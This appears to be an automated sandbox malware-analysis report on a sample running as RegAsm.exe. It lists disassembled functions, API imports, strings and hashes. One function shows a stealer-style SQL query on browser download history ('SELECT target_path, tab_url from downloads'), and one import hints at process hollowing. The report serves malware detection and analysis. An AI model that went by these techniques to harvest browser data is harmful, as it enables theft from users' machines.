Opcode Fuzzy Hash: 810fa2131d7d0d63ed147a8aed52f8d7443ea23f6258de681c5d64092aaa7cf8
Instruction Fuzzy Hash: C8018F706003449FAF04DF5ADC84C1177B8FB8931470681AAF9098B742DB71EC00CBA1

Function 6C51F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C51EE51,?), ref: 6C51F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C51F0C2

Strings

ole32, xrefs: 6C51F0AD
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C51F0DC
Could not find CoTaskMemFree, xrefs: 6C51F0E3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 6d8946b445b6fef0ae0a7a90a9fff3ec236161d53fd23eb4b6ea8c4a75398f1b
Instruction ID: fd29b3ee811eca942e900cb5371e1e8616da8228bbf6b3f877d93a9e1f04268f
Opcode Fuzzy Hash: 6d8946b445b6fef0ae0a7a90a9fff3ec236161d53fd23eb4b6ea8c4a75398f1b
Instruction Fuzzy Hash: A0E04FB47483919FBF14AE779C0CA2B37BD6B5220935686ADF503D1E41EB20D410862A

Function 6C5500D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C527235), ref: 6C5500D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C5500F7
FreeLibrary.KERNEL32(?,6C527235), ref: 6C55010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C5500F1
wintrust.dll, xrefs: 6C5500D3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: d349270ee519b7aff8076010a958b41e7025ce76d56f2898ac9d4d583026eb1b
Instruction ID: a60fd6d33e2c5e127ea0429f5e9d6bb5139abca517b959fee6604095c1d2b5cf
Opcode Fuzzy Hash: d349270ee519b7aff8076010a958b41e7025ce76d56f2898ac9d4d583026eb1b
Instruction Fuzzy Hash: 59E04F742013C59BFF40AF26CD097223AFCE703308F634197B90A81600DB70D090CB19

Function 6C550080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C527204), ref: 6C550088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C5500A7
FreeLibrary.KERNEL32(?,6C527204), ref: 6C5500BE

Strings

wintrust.dll, xrefs: 6C550083
CryptCATAdminAcquireContext2, xrefs: 6C5500A1

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: d936bce6ac0bc3ca8e6209091f5415798f6fd7b60ee08d302658b3b42b8bb5b9
Instruction ID: cc841d6711a93abe338ded706d73653e902c7b124557ba630ab3a14faa8195ac
Opcode Fuzzy Hash: d936bce6ac0bc3ca8e6209091f5415798f6fd7b60ee08d302658b3b42b8bb5b9
Instruction Fuzzy Hash: 6AE012742003C49BEF90BF269C087063AFCA70B348F87829BB920D2620DBB8C0108B19

Function 6C550170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C527308), ref: 6C550178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C550197
FreeLibrary.KERNEL32(?,6C527308), ref: 6C5501AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C550191
wintrust.dll, xrefs: 6C550173

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 36aa29bd57f142ac3f84978f814d067beca5e18affb73de7d2a019596856d4cf
Instruction ID: 39453c7b355b838e409b49828b91b950e547885adc45a5a0bd5fef0e9f64b77e
Opcode Fuzzy Hash: 36aa29bd57f142ac3f84978f814d067beca5e18affb73de7d2a019596856d4cf
Instruction Fuzzy Hash: 20E01A746813909BFF90AF25CD08B013BFCB74724DF6301D7F98182A40DB708050CA59

Function 6C550120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C527297), ref: 6C550128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C550147
FreeLibrary.KERNEL32(?,6C527297), ref: 6C55015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6C550141
wintrust.dll, xrefs: 6C550123

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: f79560e248ede11bddfb3535049c372d0dee05651a4fba33b3707c144900bdc8
Instruction ID: 94913ad61db8d3180c4f79f2192e46b55b1164ac097c5d7751cb7e44b1bb267e
Opcode Fuzzy Hash: f79560e248ede11bddfb3535049c372d0dee05651a4fba33b3707c144900bdc8
Instruction Fuzzy Hash: 69E0EE752043C49BEB80AF2A8C0C7023AFCA747309F43869AAA05C2610DBB0C0108F29

Function 6C5501C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C527266), ref: 6C5501C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C5501E7
FreeLibrary.KERNEL32(?,6C527266), ref: 6C5501FE

Strings

CryptCATAdminReleaseContext, xrefs: 6C5501E1
wintrust.dll, xrefs: 6C5501C3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 7fbbd81f0e480c77a3f8c3e0138f7be08bbc87fe5ad700844066ea116201d808
Instruction ID: d3e4ac06e46d104ba6ee3cc3b7e30dab642b392884ad0f4f0bff40487c58263f
Opcode Fuzzy Hash: 7fbbd81f0e480c77a3f8c3e0138f7be08bbc87fe5ad700844066ea116201d808
Instruction Fuzzy Hash: C5E092746813C59BEF90AF668C087027AFCAB47389F53869AFA15C1650EBB0C4109B29

Function 6C57C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C57C0E9), ref: 6C57C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C57C437
FreeLibrary.KERNEL32(?,6C57C0E9), ref: 6C57C44C

Strings

NtQueryVirtualMemory, xrefs: 6C57C431
ntdll.dll, xrefs: 6C57C413

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: a7210e3e8c8517966cfbbbf0afe73b75bca55956881f020a3a39a17bc01d27c0
Instruction ID: c50255a456fe78bc492b6f788919591f6f6c9303cd0259362515a53f12b3ebb0
Opcode Fuzzy Hash: a7210e3e8c8517966cfbbbf0afe73b75bca55956881f020a3a39a17bc01d27c0
Instruction Fuzzy Hash: A2E0B6706113819BEF60BF72DD087157BFCA70A205F1B439ABA04A1601EBB0D4108B68

Function 6C5775B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C57748B,?), ref: 6C5775B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C5775D7
FreeLibrary.KERNEL32(?,6C57748B,?), ref: 6C5775EC

Strings

RtlNtStatusToDosError, xrefs: 6C5775D1
ntdll.dll, xrefs: 6C5775B3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 58ef91566551b6a42d2f6f3021e042c7c257da2888d4dbfcefe0541f7e8d6aac
Instruction ID: 4be94cf70930026ad3ef61140df6d76584a8ea4103b3f125ae894188aa62a383
Opcode Fuzzy Hash: 58ef91566551b6a42d2f6f3021e042c7c257da2888d4dbfcefe0541f7e8d6aac
Instruction Fuzzy Hash: DAE0B6B1600381ABEF11AFA2EC487017AFCEB46358F1346A9B915D1601EBF08451CF18

Function 6C577600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C577592), ref: 6C577608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C577627
FreeLibrary.KERNEL32(?,6C577592), ref: 6C57763C

Strings

ntdll.dll, xrefs: 6C577603
NtUnmapViewOfSection, xrefs: 6C577621

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 64de4d74d8dbd24588b516ba6583df2c5842356eddfa387012e71129a8dad0f0
Instruction ID: eb27d8c467d3d59ad1581932344beb7fabf7a73e875252f26a1b39c1ec8bbe7d
Opcode Fuzzy Hash: 64de4d74d8dbd24588b516ba6583df2c5842356eddfa387012e71129a8dad0f0
Instruction Fuzzy Hash: 38E0B6B46003C1ABEF11AFA6EC087497ABCE71A399F034699F905D1700E7B084048F1C

Function 6C57C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C57C1DE,?,00000000,?,00000000,?,6C52779F), ref: 6C57C1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C57C217
FreeLibrary.KERNEL32(?,6C57C1DE,?,00000000,?,00000000,?,6C52779F), ref: 6C57C22C

Strings

WinVerifyTrust, xrefs: 6C57C211
wintrust.dll, xrefs: 6C57C1F3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 31ff3a8a3318ed0f115cc346691a444c35920c5606bc4f43550e405fa413c99b
Instruction ID: 4ef46f571ec553e2bef2ea204f47b744f586af36a25973f03ecd0d2f30816cae
Opcode Fuzzy Hash: 31ff3a8a3318ed0f115cc346691a444c35920c5606bc4f43550e405fa413c99b
Instruction Fuzzy Hash: A5E0B6742113C19BEF50BF62CD087027EFCAB07245F130799B904C1611E7B49400CB58

Function 6C57C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C5277F6), ref: 6C57C248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C57C267
FreeLibrary.KERNEL32(?,6C5277F6), ref: 6C57C27C

Strings

CryptCATAdminAcquireContext, xrefs: 6C57C261
wintrust.dll, xrefs: 6C57C243

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 284dd900bdad365d7bbc0d1ae1d7073cac8a542b114b7ad993a1a45fac7eda67
Instruction ID: 38cd457a4c7bb68443cfb654a918bf56c4f91e0e4cb3912373b0cac2cf4068cd
Opcode Fuzzy Hash: 284dd900bdad365d7bbc0d1ae1d7073cac8a542b114b7ad993a1a45fac7eda67
Instruction Fuzzy Hash: 2FE0B6742003819BEF94BF62EC087027EFCE70B309F134299F924C2610E7B894519F58

Function 6C57C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C5277C5), ref: 6C57C298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C57C2B7
FreeLibrary.KERNEL32(?,6C5277C5), ref: 6C57C2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6C57C2B1
wintrust.dll, xrefs: 6C57C293

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 0805fa9dd882e25617dc6052a172cfffebc51153309fd7c31f8973f184e9aa42
Instruction ID: 75d9f2e9ed90bbf748aa16b1b82fefc85b4c2dc06b5087f62d1d714e3d530bfe
Opcode Fuzzy Hash: 0805fa9dd882e25617dc6052a172cfffebc51153309fd7c31f8973f184e9aa42
Instruction Fuzzy Hash: FCE092752513919FEF50BF6ACD087037AFCEB06244F570299B90881A20E7B1D400CA68

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

SELECT target_path, tab_url from downloads, xrefs: 004093B9
Downloads, xrefs: 004092D1
Downloads, xrefs: 00409328

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction ID: 7fac0f62cf2577a5a8d57f6ab71485126a571a4460cd7af8d0bbaabf91a59925
Opcode Fuzzy Hash: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction Fuzzy Hash: EA712D71A40119ABCF01FFA6DE469DDB775AF04309F610026F500B70A1DBB8AE898B98

Function 6C57BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C57BE49), ref: 6C57BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C57BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C57BE49), ref: 6C57BF38
RtlReAllocateHeap.NTDLL ref: 6C57BF83
RtlFreeHeap.NTDLL ref: 6C57BFA6

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 6450273ee9c6e021d3e601868aa8f9415c410c7170404f412f7a2680b2c1fe8c
Instruction ID: 54a1ed23ad833abf03a727662dd9be079bf969fa5691d0851f23b77ffb49c15d
Opcode Fuzzy Hash: 6450273ee9c6e021d3e601868aa8f9415c410c7170404f412f7a2680b2c1fe8c
Instruction Fuzzy Hash: 84519F71A002158FE724DF68CD80BAAB3B2FFC8714F294639D555A7B94D730F9868B90

Function 6C568E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C55B58D,?,?,?,?,?,?,?,6C58D734,?,?,?,6C58D734), ref: 6C568E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C55B58D,?,?,?,?,?,?,?,6C58D734,?,?,?,6C58D734), ref: 6C568EBF
free.MOZGLUE(?,?,?,?,6C55B58D,?,?,?,?,?,?,?,6C58D734,?,?,?), ref: 6C568F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C55B58D,?,?,?,?,?,?,?,6C58D734,?,?,?,6C58D734), ref: 6C568F46
free.MOZGLUE(?,?,?,?,6C55B58D,?,?,?,?,?,?,?,6C58D734,?,?,?), ref: 6C568F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C55B58D,?,?,?,?,?,?,?,6C58D734,?,?,?), ref: 6C568F8F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 8be7e176e4d845aee0d02436d0f63e423c1ade57425b3fb04429e2c062243d43
Instruction ID: 6e7043d6c421a38a4e000898f1e34debd1b535393ee45dfa4fc74224efe58c26
Opcode Fuzzy Hash: 8be7e176e4d845aee0d02436d0f63e423c1ade57425b3fb04429e2c062243d43
Instruction Fuzzy Hash: 2F5190B1A012168FEB14CF64DC8076EB3B6BF46318F25056AD916ABB50E731F904CB92

Function 6C5260E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C525FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5260F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C525FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C526180
free.MOZGLUE(?,?,?,?,6C525FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C526211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C525FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C526229
free.MOZGLUE(?,?,?,?,6C525FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C52625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C525FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C526271

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: fa62ad9012f90ab245f59040e960fc1a15b67cd387c425a4a29b3ef9b139910f
Instruction ID: 6b76ea1dcfa6a514cc219e6f7af873da0f10a99e4530a19ea6a0d707e8420751
Opcode Fuzzy Hash: fa62ad9012f90ab245f59040e960fc1a15b67cd387c425a4a29b3ef9b139910f
Instruction Fuzzy Hash: C35169B1A013068BEB14CF68DC807AEB7F5AF45308F210479C616D7791EB39AA54CB61

